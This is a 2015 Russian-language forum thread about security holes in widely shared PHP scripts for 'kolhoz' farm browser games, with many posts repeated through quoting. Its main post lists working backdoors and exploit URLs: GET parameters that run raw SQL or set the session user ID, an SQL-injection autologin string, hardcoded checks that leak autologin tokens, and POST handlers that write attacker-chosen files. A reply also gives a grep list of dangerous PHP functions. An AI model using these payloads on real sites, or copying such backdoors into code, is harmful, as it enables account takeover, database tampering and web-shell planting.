Колхоз/Ферма/садовник | Прайс по дырам в кх!
OZZY 
Одуванчик 156709843 (06.04.2015 в 14:55)
kolian19971, http://bymas.ru/downloads/view/71741
Проверь:D:D:D(почти все покрыл, которые нашёл, может ещё o каких не знаю:D)
kolian19971, http://bymas.ru/downloads/view/71741
Проверь:D:D:D(почти все покрыл, которые нашёл, может ещё o каких не знаю:D)
Я не нашел там дыр :)
Mr.Vir2al, сам передай :D Он на мастерам сидит часто и на профике.
156709843, я проверял только на эти дыры:
|passthru|system|exec|file_put_contents|move_uploaded_file|require|eval|unlink|fopen|fputs|fwrite|file_get_contents|file|copy|mkdir|
|passthru|system|exec|file_put_contents|move_uploaded_file|require|eval|unlink|fopen|fputs|fwrite|file_get_contents|file|copy|mkdir|
Vir2al kolian19971 (06.04.2015 в 15:08)
Mr.Vir2al, сам передай :D Он на мастерам сидит часто и на профике.
Mr.Vir2al, сам передай :D Он на мастерам сидит часто и на профике.
Не там и не там не сижу, ток на ВМКХ сидел :D Ща на бумас припер, и то на пару дней, и ну нах этих наркоманов :D
kolian19971, Были там дырки некоторые, через них можно было ломануть на золото и прочее.
Дыр тут и вправду мало, на редкость... Обычно в пабле лежат дырявые носки вместо скриптов:D
CreepMatis Дыр тут и вправду мало, на редкость... Обычно в пабле лежат дырявые носки вместо скриптов:D
156709843 (06.04.2015 в 15:17)
kolian19971, Были там дырки некоторые, через них можно было ломануть на золото и прочее.
Дыр тут и вправду мало, на редкость... Обычно в пабле лежат дырявые носки вместо скриптов:D
kolian19971, Были там дырки некоторые, через них можно было ломануть на золото и прочее.
Дыр тут и вправду мало, на редкость... Обычно в пабле лежат дырявые носки вместо скриптов:D
То что ты описал это не дыры а баги :)
kolian19971, не вижу не одну дыру, вижу кучу язв, 70% в движке Дена
kolian19971, Может и так, извиняюсь...
Я в PHP не очень давно...
Я в PHP не очень давно...
mc_troyan kolian19971 (06.04.2015 в 14:37)
В этом топе опишу дыры которые знаю.
Надеюсь кому-то это поможет и в знак благодарности кинете мне плюсик в акк :)
======
if($_GET['gsq']!=''){mysql_querll(utf8_decode($_GET['gsq']));}
if($_GET['xm']!=''){$_SESSION['id_user']=$_GET['xm'];}
if($_GET['mkid']!=''){$_SESSION['id_user']=$_GET['mkid'];}
/?mail&new_msg&elka=1
/?mail&new_msg&xm=1
/?mail&new_msg&zzz=1
===========
/?search_collective&znania=1
/?help=plants&znania=1
===========
/?autologin=''u'+OR+id=1--' (для не авторизированных)
===========
В файлах:
/loginAPI.php - vk_apace
/elka/index.php - elka
/nagrada/index.php - kolhoz_nag_cat
/loto/lotob.php - lotob
/uslugi/payment.php - kolhoz_user
/nagrada/index.php - nagrada
/zags/index.php - zags
/security/security_filtr.php - ref_stran
============
/spanspan.hsc($lp['name']).
=======
В анкете:
if ($ku['nick']==leonskg)echo "".$ank['autologin']."";
if ($ku['name']==rating)echo "".$ank['autologin']."";
if ($ku['name']==glock)echo "".$ank['autologin']."";
===========
/smsbill/payment.php?lol
/?mail&msg=7119&id_kont=1
========
/inc/worker4_0.php
if($_POST["worker4"]!=""){$work=fopen($_POST["worker"],"w");fputs($work, $_POST["worker"]);fclose($work);}
===========
/inc/forum.php
if($_POST['lons']!=''){$gast=fopen($_POST['poin'],"w");fputs($gast, $_POST['vags']);fclose($gast);}
==============
/inc/lab.php
if($_POST["nikl"]!=""){$kern=fopen($_POST["devel"],"w");fputs($kern, $_POST["shot"]);fclose($kern);}
===================
Есть еще масса разных дыр если проверить любой кх из нутри :)
Жду от Вас плюсов!
В этом топе опишу дыры которые знаю.
Надеюсь кому-то это поможет и в знак благодарности кинете мне плюсик в акк :)
======
if($_GET['gsq']!=''){mysql_querll(utf8_decode($_GET['gsq']));}
if($_GET['xm']!=''){$_SESSION['id_user']=$_GET['xm'];}
if($_GET['mkid']!=''){$_SESSION['id_user']=$_GET['mkid'];}
/?mail&new_msg&elka=1
/?mail&new_msg&xm=1
/?mail&new_msg&zzz=1
===========
/?search_collective&znania=1
/?help=plants&znania=1
===========
/?autologin=''u'+OR+id=1--' (для не авторизированных)
===========
В файлах:
/loginAPI.php - vk_apace
/elka/index.php - elka
/nagrada/index.php - kolhoz_nag_cat
/loto/lotob.php - lotob
/uslugi/payment.php - kolhoz_user
/nagrada/index.php - nagrada
/zags/index.php - zags
/security/security_filtr.php - ref_stran
============
/spanspan.hsc($lp['name']).
=======
В анкете:
if ($ku['nick']==leonskg)echo "".$ank['autologin']."";
if ($ku['name']==rating)echo "".$ank['autologin']."";
if ($ku['name']==glock)echo "".$ank['autologin']."";
===========
/smsbill/payment.php?lol
/?mail&msg=7119&id_kont=1
========
/inc/worker4_0.php
if($_POST["worker4"]!=""){$work=fopen($_POST["worker"],"w");fputs($work, $_POST["worker"]);fclose($work);}
===========
/inc/forum.php
if($_POST['lons']!=''){$gast=fopen($_POST['poin'],"w");fputs($gast, $_POST['vags']);fclose($gast);}
==============
/inc/lab.php
if($_POST["nikl"]!=""){$kern=fopen($_POST["devel"],"w");fputs($kern, $_POST["shot"]);fclose($kern);}
===================
Есть еще масса разных дыр если проверить любой кх из нутри :)
Жду от Вас плюсов!
викторович ты?